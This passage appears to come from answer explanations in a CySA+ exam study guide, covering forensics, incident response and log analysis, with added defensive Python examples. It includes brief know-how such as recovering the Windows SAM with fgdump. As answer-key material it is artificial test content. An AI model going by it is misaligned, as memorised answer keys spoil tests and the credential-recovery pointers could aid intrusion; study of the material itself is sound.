means of assessing how much traffic a system has sent when dealing with large volumes of 
traffic. Alex should use an alternate tool designed specifically to monitor traffic levels to 
assess the system’s bandwidth usage. 


C. Brian should determine whether he needs live forensic information, but if he is not
certain, the safest path for him is to collect live forensic information, take photos so that
he knows how each system was set up and configured, and then power them down. He
would then log each system as evidence and will likely create forensic copies of the drives
once he reaches his forensic work area or may use a portable forensic system to make
drive images on-site. Powering a running system down can result in the loss of significant
forensic information, meaning that powering a system down before collecting some information
is typically not recommended. Collecting a static image of a drive requires powering
the system down first!


B. When forensic evidence or information is produced for a civil case, it is called 
e-discovery. This type of discovery often involves massive amounts of data including 
email, files, text messages, and any other electronic evidence that is relevant to the case. 


A. Personally identifiable information (PII) includes information that can be used to identify,
contact, or locate a specific individual. At times, PII must be combined with other
data to accomplish this but remains useful for directly identifying an individual. The data
that Charles and Linda are classifying is an example of PII. PHI is personal health information.
Intellectual property is the creation of human minds including copyrighted works,
inventions, and other similar properties. PCI-DSS is the Payment Card Industry Data
Security Standards.


C. A chain of custody form is used to record each person who works with or is in contact 
with evidence in an investigation. Typically, investigative work is also done in a way that 
fully records all actions taken and sometimes requires two people present to verify actions 
taken. 
A. Since Scott needs to know more about potential vulnerabilities, an authenticated scan
from an internal network will provide him with the most information. He will not gain a
real attacker’s view, but in this case, having more detail is important!


C. The primary role of management in an incident response effort is to provide the 
authority and resources required to respond appropriately to the incident. They may also 
be asked to make business decisions, communicate with external groups, or assess the 
impact on key stakeholders. 


D. Both auth.log and /etc/passwd may show evidence of the new user, but auth.log
will provide details, while Chris would need to have knowledge of which users existed
prior to this new user being added. Chris will get more useful detail by checking
auth.log.


C. Process Monitor provides detailed tracking of filesystem and registry changes as well 
as other details that can be useful when determining what changes an application makes 
to a system. This is often used by system administrators as well as forensic and incident 
response professionals, as it can help make tracking down intricate installer problems 
much easier! 


C. NIST does not include making backups of every system and device in its documentation.
Instead, NIST suggests maintaining an organization-wide knowledge base with
critical information about systems and applications. Backing up every device and system
can be prohibitively expensive. Backups are typically done only for specific systems and
devices, with configuration and restoration data stored for the rest.


B. NIST identifies four major phases in the IR life cycle: preparation; detection and analysis;
containment, eradication, and recovery; and post-incident activity. Notification and
communication may occur in multiple phases.


D. The page file, like many system files, is locked while Windows is running. Charles simply
needs to shut down the system and copy the page file. Some Windows systems may be
set to purge the page file when the system is shut down, so he may need to pull the plug to
get an intact page file.


B. Checking the SSID won’t help since an evil twin specifically clones the SSID of a legitimate
AP. Evil twins can be identified by checking their BSSID (the wireless MAC address).
If the wireless MAC has been cloned, checking additional attributes such as the channel,
cipher, or authentication method can help identify them. In many cases, they can also be
identified using the organizational unique identifier (OUI) that is sent as a tagged parameter
in beacon frames.
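The checks described in this answer, worked through as an added example (not code from the book): observed beacons are compared with a constructed inventory of authorized access points by BSSID, then by channel, cipher and authentication method, and finally by OUI. All access point values below are made up.

```python
"""Classify observed Wi-Fi beacons against an inventory of authorized APs.

Constructed example: the inventory and the observed beacons are made up.
An SSID match alone proves nothing, so the checks compare BSSID, then
channel, cipher and auth method, and finally the OUI (manufacturer prefix).
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class AccessPoint:
    ssid: str
    bssid: str      # wireless MAC address, e.g. "00:11:22:aa:bb:cc"
    channel: int
    cipher: str     # e.g. "CCMP"
    auth: str       # e.g. "WPA2-Enterprise"


def oui(mac: str) -> str:
    """Return the first three octets (the manufacturer prefix), normalized."""
    return mac.upper()[:8]


def classify(observed: AccessPoint, inventory: list) -> tuple:
    """Return (verdict, reasons) for one observed beacon.

    verdict is one of: "ok", "unknown-ssid", "evil-twin", "cloned-bssid".
    """
    same_ssid = [ap for ap in inventory if ap.ssid == observed.ssid]
    if not same_ssid:
        # Not one of our SSIDs at all; out of scope for evil-twin checks.
        return "unknown-ssid", []

    same_bssid = [ap for ap in same_ssid
                  if ap.bssid.lower() == observed.bssid.lower()]
    if not same_bssid:
        reasons = ["BSSID not in inventory for this SSID"]
        if oui(observed.bssid) not in {oui(ap.bssid) for ap in same_ssid}:
            reasons.append("OUI differs from authorized APs")
        return "evil-twin", reasons

    # The BSSID matches a known AP, but the MAC may have been cloned, so
    # compare the remaining attributes the authorized AP is known to use.
    known = same_bssid[0]
    reasons = []
    for attr in ("channel", "cipher", "auth"):
        seen, expected = getattr(observed, attr), getattr(known, attr)
        if seen != expected:
            reasons.append(f"{attr} mismatch: saw {seen!r}, expected {expected!r}")
    return ("cloned-bssid", reasons) if reasons else ("ok", [])


# Constructed inventory of authorized APs (values are made up).
INVENTORY = [
    AccessPoint("CorpWiFi", "00:11:22:aa:bb:01", 6, "CCMP", "WPA2-Enterprise"),
    AccessPoint("CorpWiFi", "00:11:22:aa:bb:02", 11, "CCMP", "WPA2-Enterprise"),
]

# Constructed beacons as a wireless scanner might report them.
OBSERVED = [
    AccessPoint("CorpWiFi", "00:11:22:aa:bb:01", 6, "CCMP", "WPA2-Enterprise"),  # legitimate
    AccessPoint("CorpWiFi", "de:ad:be:ef:00:01", 6, "CCMP", "WPA2-PSK"),         # foreign BSSID and OUI
    AccessPoint("CorpWiFi", "00:11:22:aa:bb:02", 1, "TKIP", "WPA2-Enterprise"),  # cloned BSSID, wrong channel/cipher
    AccessPoint("GuestNet", "00:11:22:aa:bb:09", 1, "CCMP", "WPA2-PSK"),         # SSID not in inventory
]


def scan_report(observed: list, inventory: list) -> dict:
    """Map each observed BSSID to its verdict so a whole scan can be summarized."""
    return {ap.bssid: classify(ap, inventory)[0] for ap in observed}


if __name__ == "__main__":
    for ap in OBSERVED:
        verdict, reasons = classify(ap, INVENTORY)
        print(ap.ssid, ap.bssid, verdict, "; ".join(reasons))
```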


C. Slack space is leftover storage that exists because files do not take up the entire space 
allocated for them. Since the Unallocated partition does not have a filesystem on it, space 
there should not be considered slack space. Both System Reserved and C: are formatted 
with NTFS and will have slack space between files. 


C. Luke should expect to find most of the settings he is looking for contained in plists, or 
property lists, which are XML files encoded in a binary format. 
C. Without other requirements in place, many organizations select a one- to two-year
retention period. This allows enough time to use existing information for investigations
but does not retain so much data that it cannot be managed. Regardless of the time period
selected, organizations should set and consistently follow a retention policy.


C. If Alice focuses on a quick restoration, she is unlikely to preserve all of the evidence
she would be able to during a longer incident response process. Since she is focusing on
quick restoration, the service should be available more quickly, and the service and system
should not be damaged in any significant way by the restoration process. The time
required to implement the strategy will typically be less if she does not conduct a full
forensic investigation and instead focuses on service restoration.


D. Criminal investigations can take very long periods of time to resolve. In most cases, 
Joe should ensure that he can continue to operate without the servers for the foreseeable 
future. 


C. A RAW image, like those created by dd, is Lauren’s best option for broad compatibility.
Many forensic tools support multiple image formats, but RAW files are supported
almost universally by forensic tools.


D. Windows systems record new device connections in the security audit log if configured
to do so. In addition, information is collected in both the setupapi log file and in the registry,
including information on the device, its serial number, and often manufacturer and
model details. The user’s profile does not include device information.


B. When a network share or mounted drive is captured from the system that mounts it,
data like deleted files, unallocated space, and other information that requires direct drive
access will not be captured. If Scott needs that information, he will need to create a forensic
image of the drive from the host server.


D. NIST identifies customers, constituents, media, other incident response teams, Internet 
service providers, incident reporters, law enforcement agencies, and software and support 
vendors as outside parties that an IR team will communicate with. 


B. Questions including what tools and resources are needed to detect, analyze, or mitigate
future incidents, as well as topics such as how information sharing could be improved,
what could be done better or differently, and how effective existing processes and policies
are, can all be part of the lessons-learned review.


B. The order of volatility for common storage locations is as follows:
1. CPU cache, registers, running processes, RAM
2. Network traffic
3. Disk drives
4. Backups, printouts, optical media


C. Removing a system from the network typically occurs as part of the containment
phase of an incident response process. Systems are typically not returned to the network
until the end of the recovery phase.
D. MD5, SHA-1, and SHA-2 hashes are all considered forensically sound. While MD5
hashes are no longer a secure means of hashing, they are still considered appropriate for
validation of forensic images because it is unlikely that an attacker would intentionally
create a hash collision to falsify the forensic integrity of a drive.


D. NIST’s Computer Security Incident Handling Guide notes that identifying an attacker 
can be “time-consuming and futile.” In general, spending time identifying attackers is not 
a valuable use of incident response time for most organizations. 


B. The ability to create a timeline of events that covers logs, file changes, and many other 
artifacts is known as a Super Timeline. SIFT includes this capability, allowing Rick to 
decide what event types and modules he wants to enable as part of his timeline-based view 
of events. 


B. It is unlikely that skilled attackers will create a new home directory for an account
they want to hide. Checking /etc/passwd and /etc/shadow for new accounts is a
quick way to detect unexpected accounts, and checking both the sudoers file and membership
in wheel and other high-privilege groups can help Charles detect unexpected accounts
with increased privileges.


A. Information Sharing and Analysis Centers (ISACs) are information sharing and community
support organizations that work within vertical industries like energy, higher
education, and other business domains. Ben may choose to have his organization join an
ISAC to share and obtain information about threats and activities that are particularly relevant
to what his organization does. A CSIRT is a Computer Security Incident Response
Team and tends to be hosted in a single organization, a VPAC is made up, and an IRT is
an incident response team.


C. Headers can be helpful when tracking down spam email, but spammers often use a
number of methods to obfuscate the original sender’s IP address, email, or other details.
Unfortunately, email addresses are often spoofed, and the email address may be falsified.
In this case, the only verifiable information in these headers is the IP address of the originating
host, mf-smf-ucb011.0cn.ad.jp (mf-smf-ucb011.0cn.ad.jp) [153.149.228.228]. At
times even this detail can be forged, but in most cases, this is simply a compromised host
or one with an open email application that spammers can leverage to send bulk email.


C. The keychain in macOS stores user credentials but does not store user account passwords.
All of the other options listed are possible solutions for Lauren, but none of them
will work if the system has FileVault turned on.


C. iPhone backups to local systems can be full or differential, and in this scenario the
most likely issue is that Cynthia has recovered a differential backup. She should look for
additional backup files if she does not have access to the original phone. If the backup was
encrypted, she would not be able to access it without a cracking tool, and if it was interrupted,
she would be unlikely to have the backup file or have it be in usable condition.
iCloud backups require access to the user’s computer or account and are less likely to be
part of a forensic investigation.
A. A second forensic examiner who acts as a witness, countersigning all documentation
and helping document all actions, provides both strong documentation and another
potential witness in court. Independent forensic action, no matter how well documented,
will not be as reliable as having a witness.


B. While it may seem obvious that the system should be isolated from the network when 
it is rebuilt, we have seen this exact scenario played out before. In one instance, the system 
was recompromised twice before the system administrator learned their lesson! 


D. MBR-, UEFI-, and BIOS-resident malware packages can all survive a drive wipe, but
hiding files in slack space will not survive a zero wipe. While these techniques are uncommon,
they do exist and have been seen in the wild.


D. Patents, copyrights, trademarks, and trade secrets are all forms of intellectual property.
Patents, copyrights, and trademarks are all legal creations to support creators, while
trade secrets are proprietary business information and are not formally protected by
governments.


B. BYOD, or bring your own device, is increasingly common, and administrators typically
find that network utilization, support tickets, and security risk (because of misconfigured,
unpatched, or improperly secured devices) increase. Most organizations do not
experience additional device costs with BYOD, as users are providing their own devices.


A. The space that Saria sees is the space between the end of the file and the space allocated
per cluster or block. This space may contain remnants of previous files written to
the cluster or block or may simply contain random data from when the disk was formatted
or initialized.


C. The U.S. National Archives General Records Schedule stipulates a three-year records 
retention period for incident-handling records. 


A. Trusted system binary kits like those provided by the National Software Reference
Library include known good hashes of many operating systems and applications. Kathleen
can validate the files on her system using references like the NSRL (https://www.nsrl.nist.gov/new.html).


A. Pluggable authentication module (PAM)-aware applications have a file in the /etc/pam.d
directory. These files list directives that define the module and what settings or controls
are enabled. Charles should ensure that the multifactor authentication system he uses
is configured as required in the PAM files for the services he is reviewing.


B. NIST specifically recommends the hostname, MAC addresses, and IP addresses of the 
system. Capturing the full output of an ipconfig or ifconfig command may be useful, 
but forensic analysis may not permit interaction with a live machine. Additional detail like 
the domain (or domain membership) may or may not be available for any given machine, 
and NIC manufacturer and similar data is not necessary under most circumstances. 
D. Since most APTs (including this one, as specified in the question) send traffic in an
encrypted form, performing network forensics or traffic analysis will only provide information
about potentially infected hosts. If Chris wants to find the actual tools that may
exist on endpoint systems, he should conduct endpoint forensics. Along the way, he may
use endpoint behavior analysis, network forensics, and network traffic analysis to help
identify target systems.


B. Each antivirus or anti-malware vendor uses their own name for malware, resulting in
a variety of names showing for a given malware package or family. In this case, the malware
package is a ransomware package that is known by some vendors as GoldenEye or
Petya.


B. When a system is not a critical business asset that must remain online, the best 
response is typically to isolate it from other systems and networks that it could negatively 
impact. By disconnecting it from all networks, Ben can safely investigate the issue without 
causing undue risk. 


We have actually encountered this situation. After investigating, we found that the user’s
text-to-speech application was enabled, and the microphone had the gain turned all the
way up. The system was automatically typing words based on how it interpreted background
noise, resulting in strange text that really terrified the unsuspecting user.


C. When clusters are overwritten, original data is left in the unused space between the 
end of the new file and the end of the cluster. This means that copying new files over old 
files can leave remnant data that may help Kathleen prove that the files were on the system 
by examining slack space. 


C. The command line for snmpwalk provides the clues you need. The -c flag specifies a
community string to use, and the -v flag specifies the SNMP version. Since we know the
community string, you can presume that the contact ID is root rather than the community
string.


C. The built-in macOS utility for measuring memory, CPU, disk, network, and power 
usage is Activity Monitor. Windows uses Resource Monitor, Sysradar was made up for 
this question, and System Monitor is used to collect information from Microsoft’s SQL 
Server via RPC. 


A. If the system that Angela is attempting to access had mounted the encrypted volume
before going to sleep and there is a hibernation file, Angela can use hibernation file
analysis tools to retrieve the BitLocker key. If the system did not hibernate or the volume
was not mounted when the system went to sleep, she will not be able to retrieve the keys.
Memory analysis won’t work with a system that is off, the boot sector does not contain
keys, and brute-force cracking is not a viable method of cracking BitLocker keys because
of the time involved.


C. The pseudocode tells you that Adam is trying to detect outbound packets that are 
part of short communications (less than 10 packets and less than 3,000 bytes) and that 
he believes the traffic may appear to be web traffic, be general TCP traffic, or not match 
known traffic types. He also is making sure that general web traffic won’t be captured by 
not matching on uripath and contentencoding. 
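The filter this answer describes, worked through as an added example (not the book's pseudocode or code): flows are kept when they are outbound, shorter than 10 packets and 3,000 bytes, labelled as web, generic TCP or unclassified traffic, and lack the URI path and Content-Encoding fields that genuine web requests carry; it then goes one step further than the text and counts hits per source/destination pair, since a beacon repeats. The flow records, the 10.0.0.0/8 internal range and the sensor's protocol labels are all constructed.

```python
"""Flag short outbound conversations that may be command-and-control beacons.

Constructed example: the Flow records, the internal address range and the
protocol labels are made up to resemble what a flow sensor might export.
"""
from collections import Counter
from dataclasses import dataclass


@dataclass
class Flow:
    src: str
    dst: str
    dst_port: int
    packets: int
    bytes: int
    protocol: str            # sensor label: "http", "tcp", "unknown", "udp", ...
    uri_path: str = ""       # set only when the sensor parsed an HTTP request line
    content_encoding: str = ""


INTERNAL_PREFIXES = ("10.",)   # assumption: the monitored network is 10.0.0.0/8


def is_internal(ip: str) -> bool:
    return ip.startswith(INTERNAL_PREFIXES)


def is_short_outbound_beacon(flow: Flow, max_packets: int = 10,
                             max_bytes: int = 3000) -> bool:
    """Apply the answer's conditions to one flow."""
    outbound = is_internal(flow.src) and not is_internal(flow.dst)
    short = flow.packets < max_packets and flow.bytes < max_bytes
    candidate_proto = flow.protocol in ("http", "tcp", "unknown")
    # Genuine web traffic carries a request path and often a Content-Encoding;
    # a beacon that merely imitates HTTP usually does not, so those flows are
    # excluded rather than matched.
    looks_like_real_web = bool(flow.uri_path) or bool(flow.content_encoding)
    return outbound and short and candidate_proto and not looks_like_real_web


def find_beacon_candidates(flows):
    return [f for f in flows if is_short_outbound_beacon(f)]


def summarize_by_pair(flows):
    """Count matching flows per (src, dst): repetition is what makes a beacon."""
    return Counter((f.src, f.dst) for f in flows)


# Constructed flow records; 203.0.113.0/24 and 198.51.100.0/24 stand in for
# external hosts.
SAMPLE_FLOWS = [
    Flow("10.0.0.5", "203.0.113.10", 443, 6, 900, "tcp"),                 # short, no HTTP fields
    Flow("10.0.0.5", "203.0.113.10", 443, 7, 1100, "unknown"),            # short, unclassified
    Flow("10.0.0.5", "198.51.100.7", 80, 5, 800, "http",
         uri_path="/index.html", content_encoding="gzip"),                # real web request
    Flow("10.0.0.9", "203.0.113.20", 443, 40, 52000, "http"),             # too long to be a beacon
    Flow("10.0.0.9", "10.0.0.1", 445, 3, 300, "tcp"),                     # internal, not outbound
    Flow("10.0.0.5", "203.0.113.10", 443, 8, 1200, "tcp"),                # short, no HTTP fields
    Flow("10.0.0.5", "198.51.100.7", 123, 4, 500, "udp"),                 # known non-web protocol
]


if __name__ == "__main__":
    hits = find_beacon_candidates(SAMPLE_FLOWS)
    for (src, dst), count in summarize_by_pair(hits).items():
        print(f"{src} -> {dst}: {count} short outbound conversations")
```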
B. Services are often started by xinetd (although newer versions of some distributions
now use systemctl). Both /etc/passwd and /etc/shadow are associated with user
accounts, and $HOME/.ssh/ contains SSH keys and other details for SSH-based logins.


B. NIST classifies changes or deletion of sensitive or proprietary information as an integrity
loss. Proprietary breaches occur when unclassified proprietary information is accessed
or exfiltrated, and privacy breaches involve personally identifiable information (PII) that is
accessed or exfiltrated.


C. While responders are working to contain the incident, they should also preserve forensic
and incident information for future analysis. Restoration of service is often prioritized
over analysis during containment activities, but taking the time to create forensic images
and to preserve log and other data is important for later investigation.


C. The system Susan is reviewing only has login failure logging turned on and will not 
capture successful logins. She cannot rely on the logs to show her who logged in but may 
be able to find other forensic indicators of activity, including changes in the user profile 
directories and application caches. 


A. The only true statement based on the image is that there are two remote users ssh’ed 
into the system. Port 9898 is registered with IANA as Monkeycom but is often used for 
Tripwire, leading to incorrect identification of the service. The local system is part of the 
example.com domain, and the command that was run will not show any UDP services 
because of the -at flag, meaning that you cannot verify if any UDP services are running. 


A. Windows does not include a built-in secure erase tool in the GUI or at the command 
line. Using a third-party program like Eraser or a bootable tool like DBAN is a reasonable 
option, and encrypting the entire drive and then deleting the key will have the same effect. 


D. The CySA+ exam objectives specifically identify data including merger and acquisition 
information as well as accounting data. This data is obviously not personally identifiable 
information or personal health information, and corporate confidential data describes it 
more accurately based on the exam objectives than intellectual property. 


C. Postmortem forensics can typically be done after shutting down systems to ensure that
a complete forensic copy is made. Live forensics imaging can help to capture memory-resident
malware. It can also aid in the capture of encrypted drives and filesystems when
they are decrypted for live usage. Finally, unsupported filesystems can sometimes be
imaged while the system is booted by copying data off the system to a supported filesystem
type. This won’t retain some filesystem-specific data but can allow key forensic activities
to take place.


D. There is no common standard for determining the age of a user account in Linux.
Some organizations add a comment to user accounts using the -c flag for user creation to
note when they are created. Using the ls command with the -ld flag will show the date of
file creation, which may indicate when a user account was created if a home directory was
created for the user at account creation, but this is not a requirement. The aureport command
is useful if auditd is in use, but that is not consistent between Linux distros.
B. Profiling networks and systems will provide a baseline behavior set. A SIEM or similar
system can monitor for differences or anomalies that are recorded as events. Once correlated
with other events, these can be investigated and may prove to be security incidents.
Dynamic and static analysis are types of code analysis, while behavioral, or heuristic,
analysis focuses on behaviors that are indicative of an attack or other undesirable behavior.
Behavioral analysis does not require a baseline; instead, it requires knowing what
behavior is not acceptable.


C. A system restore should not be used to rebuild a system after an infection or compromise
since it restores only Windows system files, some program files, registry settings,
and hardware drivers. This means that personal files and most malware, as well as programs
installed or modifications to programs after the restore point is created, will not be
restored.


B. Portable imaging tools like FTK Imager Lite can be run from removable media, allowing
a live image to be captured. Ben may still want to capture the system memory as well,
but when systems are used for data gathering and egress, the contents of the disk will be
important. Installing a tool or taking the system offline and mounting the drive are both
undesirable in this type of scenario when the system must stay online and should not be
modified.


C. The File System audit subcategory includes the ability to monitor for both access to 
objects (event ID 4663) and permission changes (event ID 4670). Charles will probably 
be most interested in 4670 permission change events, as 4663 events include read, write, 
delete, and other occurrences and can be quite noisy! 


B. If Charles has good reason to believe he is the only person with root access to the system,
he should look for a privilege escalation attack. A remote access Trojan would not
directly provide root access, and a hacked root account is less likely than a privilege escalation
attack. A malware infection is possible, and privilege escalation would be required
to take the actions shown.


B. NIST describes brute-force methods used to degrade networks or services as a form 
of attrition in their threat classification scheme. It may be tempting to call this improper 
usage, and it is; however, once an employee has been terminated, it is no longer an insider 
attack, even if the employee retains access. 


C. The original creation date (as shown by the GPS time), the device type (a Nexus 6P), 
the GPS location, and the manufacturer of the device (Huawei) can all provide useful 
forensic information. Here, you know when the photo was taken, where it was taken, 
and what type of device it was taken on. This can help narrow down who took the 
photo or may provide other useful clues when combined with other forensic information 
or theories. 


B. A jump kit is a common part of an incident response plan and provides responders 
with the tools they will need without having to worry about where key pieces of equip- 
ment are during a stressful time. Crash carts are often used in data centers to connect a 
keyboard, mouse, and monitor to a server to work on it. First-responder kits are typically 
associated with medical responders, and a grab bag contains random items! 
B. Chrome uses the number of seconds since midnight on January 1, 1601, for its timestamps. This is similar to the file time used by Microsoft in some locations, although the file time records time in 100 nanosecond slices instead of seconds. Since the problem did not specify an operating system and Chrome is broadly available for multiple platforms, you'll likely have recognized that this is unlikely to be a Microsoft timestamp. ISO 8601 is written in a format like this: 2017-04-02T04:01:34+00:00.
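Converting a 1601-epoch value into the ISO 8601 form shown above is a routine forensic step. The following is an added example, not code from the book: it handles both tick sizes the explanation mentions (whole seconds, and the 100 nanosecond ticks of a Windows FILETIME) as a parameter, converts to an aware UTC datetime, and includes a plausibility check that distinguishes 1601-epoch counts from Unix timestamps. The function names and the unit labels are this example's own choices.

```python
"""Convert 1601-epoch timestamps to ISO 8601 (added example, not from the book)."""
from datetime import datetime, timedelta, timezone

EPOCH_1601 = datetime(1601, 1, 1, tzinfo=timezone.utc)
# Seconds between 1601-01-01 and the Unix epoch (1970-01-01): 134774 days.
SECONDS_1601_TO_1970 = 11_644_473_600


def epoch1601_to_datetime(value, unit="seconds"):
    """Return an aware UTC datetime for `value` counted from 1601-01-01.

    unit is "seconds" (whole seconds, as described for Chrome above) or
    "filetime" (100 ns ticks, the Windows FILETIME granularity).
    """
    if unit == "seconds":
        delta = timedelta(seconds=value)
    elif unit == "filetime":
        # timedelta resolves to microseconds, so drop the sub-microsecond part.
        delta = timedelta(microseconds=value // 10)
    else:
        raise ValueError(f"unknown unit {unit!r}")
    return EPOCH_1601 + delta


def epoch1601_to_iso(value, unit="seconds"):
    """ISO 8601 with explicit +00:00 offset, e.g. 2017-04-02T04:01:34+00:00."""
    return epoch1601_to_datetime(value, unit).isoformat(timespec="seconds")


def epoch1601_to_unix(value, unit="seconds"):
    """Equivalent Unix timestamp (seconds since 1970-01-01 UTC)."""
    return int(epoch1601_to_datetime(value, unit).timestamp())


def looks_like_1601_epoch(value):
    """Plausibility check: any 1601-epoch second count for a date after 1970
    exceeds the 1601->1970 offset, whereas Unix timestamps are far smaller."""
    return value >= SECONDS_1601_TO_1970


if __name__ == "__main__":
    # Constructed value: 2017-04-02T04:01:34Z expressed as seconds since 1601.
    sample = 13_135_579_294
    print(looks_like_1601_epoch(sample), epoch1601_to_iso(sample))
```

The constant 11644473600 is the key to recognizing these values in the field: a 1601-epoch count in seconds for any modern date is an 11-digit number above it, and a FILETIME is 18 digits.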


B. While it may seem like an obvious answer, Microsoft’s MBSA is now outdated and does not fully support Windows 10. Cynthia should select one of the other options listed to ensure that she gets a complete report.


D. Facebook, as well as many other social media sites, now strip image metadata to help protect user privacy. John would need to locate copies of the photos that have not had the metadata removed and may still find that they did not contain additional useful data.


D. The U.S. Department of Health and Human Services defines PHI data elements to include all “individually identifiable health information,” including an individual’s physical or mental health and their payment for healthcare in the past, present, or future; their identity or information that could be used to identify an individual; and the data about the provision of healthcare to individuals. It does not include educational records.


A. FISMA requires that U.S. federal agencies report incidents to US-CERT. CERT/CC is the coordination center of the Software Engineering Institute and researches software and Internet security flaws as well as works to improve software and Internet security. The National Cyber Security Authority is Israel’s CERT, while the National Cyber Security Centre is the UK’s CERT.


C. The order of volatility for media from least to most volatile is often listed as backups and printouts; then disk drives like hard drives and SSDs; then virtual memory; and finally CPU cache, registers, and RAM. Artifacts stored in each of these locations can be associated with the level of volatility of that storage mechanism. For example, routing tables will typically be stored in RAM, making them highly volatile. Data stored on rewritable media is always considered more volatile than data stored on write-only media.


B. The SAM is stored in C:\Windows\System32\config but is not accessible while the system is booted. The hashed passwords are also stored in the registry at HKEY_LOCAL_MACHINE\SAM but are also protected while the system is booted. The best way to recover the SAM is by booting off of removable media or using a tool like fgdump.


A. Modern Microsoft Office files are actually stored in a .zip format. Alex will need to open them using a utility that can unzip them before he can manually review their contents. He may want to use a dedicated Microsoft Office forensics tool or a forensics suite with built-in support for Office documents.
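Because an OOXML document is an ordinary ZIP archive, a first-pass review needs nothing beyond the standard library. The following is an added example, not code from the book or from any forensics suite: it builds a constructed minimal .docx in memory (real documents contain many more parts, but the container is the same), lists its parts, pulls the visible text runs out of word/document.xml, and checks for a vbaProject.bin part, which is where macro code lives in a macro-enabled document.

```python
"""Inspect a modern Office file as the ZIP container it is (added example, not from the book)."""
import io
import re
import zipfile


def build_sample_docx(with_macro=False):
    """Constructed minimal .docx for this example. Real files also carry
    _rels/.rels, docProps/, styles, and so on; the container format is the same."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", '<?xml version="1.0"?><Types/>')
        z.writestr(
            "word/document.xml",
            "<w:document><w:body><w:p>"
            "<w:r><w:t>Quarterly results</w:t></w:r>"
            "<w:r><w:t>are attached.</w:t></w:r>"
            "</w:p></w:body></w:document>",
        )
        if with_macro:
            # Constructed stub standing in for an OLE2 (CFB) macro container.
            z.writestr("word/vbaProject.bin", b"\xd0\xcf\x11\xe0")
    return buf.getvalue()


def list_parts(data):
    """Every part (member file) stored in the document container."""
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        return sorted(z.namelist())


def extract_text(data):
    """Join the visible text runs (<w:t> elements) from the main document part."""
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        xml = z.read("word/document.xml").decode("utf-8")
    return " ".join(re.findall(r"<w:t[^>]*>(.*?)</w:t>", xml))


def has_vba_project(data):
    """A vbaProject.bin part means the document carries macro code and
    deserves a closer look before it is opened in Office."""
    return any(name.lower().endswith("vbaproject.bin") for name in list_parts(data))


if __name__ == "__main__":
    doc = build_sample_docx()
    print(list_parts(doc))
    print(extract_text(doc))
    print("macros:", has_vba_project(doc), has_vba_project(build_sample_docx(True)))
```

The regular-expression text extraction is deliberately crude; a real review would parse the XML and also walk headers, footers, comments and embedded objects, but the container walk is the same.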


B. Memory pressure is a macOS-specific term used to describe the availability of memory resources. Yellow segments on a memory pressure chart indicate that memory resources are still available but are being tasked by memory management processes such as compression.


D. Once a command prompt window has been closed on a Windows system, the command history is erased. If Lucas could catch the user with an open command prompt, he could hit F7 and see the command history.


C. Wireless evil twin attacks use a rogue AP configured to spoof the MAC address of a legitimate access point. The device is then configured to provide what looks like a legitimate login page to capture user credentials, allowing attackers to use those credentials to access other organizational resources.


D. The program netcat is typically run using nc. The -k flag for netcat makes it listen continuously rather than terminating after a client disconnects, and -l determines the port that it is listening on. In this case, the netcat server is listening on TCP port 6667, which is typically associated with IRC.


D. Economic impact is calculated on a relative scale, and Angela does not have all of the information she needs. A $500,000 loss may be catastrophic for a small organization and may have a far lower impact to a Fortune 500 company. Other factors like cybersecurity insurance may also limit the economic impact of a cybersecurity incident.


D. Chris simply needs to generate a known event ID that he can uniquely verify. Once he does, he can log into the SIEM and search for that event at the time he generated it to validate that his system is sending syslogs.


C. Windows includes a built-in memory protection scheme called DEP that prevents code from being run in pages that are marked as nonexecutable. By default, DEP only protects “essential Windows programs and services,” but it can be enabled for all programs and services, can be enabled for all programs and services except those that are on an exception list, or can be entirely disabled.


B. The NIST guidelines require validation after clearing, purging, or destroying media to ensure that the action that was taken is effective. This is an important step since improperly applying the sanitization process and leaving data partially or even fully intact can lead to a data breach!


C. In this case, with current payroll and financial data encrypted and payroll unable to be run, this should be categorized as a high-severity incident.


B. Tamper-proof seals are used when it is necessary to prove that devices, systems, or spaces were not accessed. They often include holographic logos that help to ensure that tampering is both visible and cannot be easily hidden by replacing the sticker. A chain of custody log works only if personnel actively use it, and system logs will not show physical access. If Lauren has strong concerns, she may also want to ensure that the room or space is physically secured and monitored using a camera system.


C. Collecting and analyzing logs most often occurs in the detection phase, while connecting attacks back to attackers is typically handled in the containment, eradication, and recovery phase of the NIST incident response process.
B. Angela has performed interactive behavior analysis. This process involves executing a file in a fully instrumented environment and then tracking what occurs. Angela’s ability to interact with the file is part of the interactive element and allows her to simulate normal user interactions as needed or to provide the malware with an environment where it can interact like it would in the wild.


C. If Ben has ensured that his destination media is large enough to contain the image, then a failure to copy is most likely because of bad media. Modification of the source data will result in a hash mismatch, encrypted drives can be imaged successfully despite being encrypted (the imager doesn’t care!), and copying in RAW format is simply a bit-by-bit copy and will not cause a failure.


A. Derek has created a malware analysis sandbox and may opt to use tools like Cuckoo, Truman, Minibis, or a commercial analysis tool. If he pulls apart the files to analyze how they work, he would be engaging in reverse engineering, and doing code-level analysis of executable malware would require disassembly. Darknets are used to identify malicious traffic and aren’t used in this way.


A. Failed SSH logins are common, either because of a user who has mistyped their password or because of scans and random connection attempts. Chris should review his SSH logs to see what may have occurred.


B. By default, Run and RunOnce keys are ignored when Windows systems are booted into Safe Mode. Clever attackers may insert an asterisk to force the program to run in Safe Mode; however, this is not a common tactic.


B. The setupapi file (C:\Windows\INF\setupapi.dev.log) records the first time a USB device is connected to a Windows system using the local system’s time. Other device information is collected in the registry, and the system security log may contain connection information if USB device logging is specifically enabled.
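Pulling first-connection times out of setupapi.dev.log is a short parsing job. The following is an added example, not code from the book: it reads the hardware-initiated device install sections of the log, pairs each device instance path with the timestamp on its "Section start" line, and reduces those to the earliest time each device was seen. The sample log is constructed in the style of the real file; the device IDs and serials in it are made up.

```python
"""Parse setupapi.dev.log for USB first-connection times (added example, not from the book)."""
import re
from datetime import datetime

# Constructed sample in the style of setupapi.dev.log. Both sections are for the
# same physical stick: the USB interface install, then the USBSTOR disk install.
SAMPLE_LOG = r""">>>  [Device Install (Hardware initiated) - USB\VID_0951&PID_1666\0015AAAAAAA]
>>>  Section start 2017/04/02 04:01:34.123
     cmd: C:\Windows\system32\svchost.exe -k netsvcs
<<<  Section end 2017/04/02 04:01:36.456
<<<  [Exit status: SUCCESS]
>>>  [Device Install (Hardware initiated) - USBSTOR\Disk&Ven_Kingston&Prod_DataTraveler\0015AAAAAAA&0]
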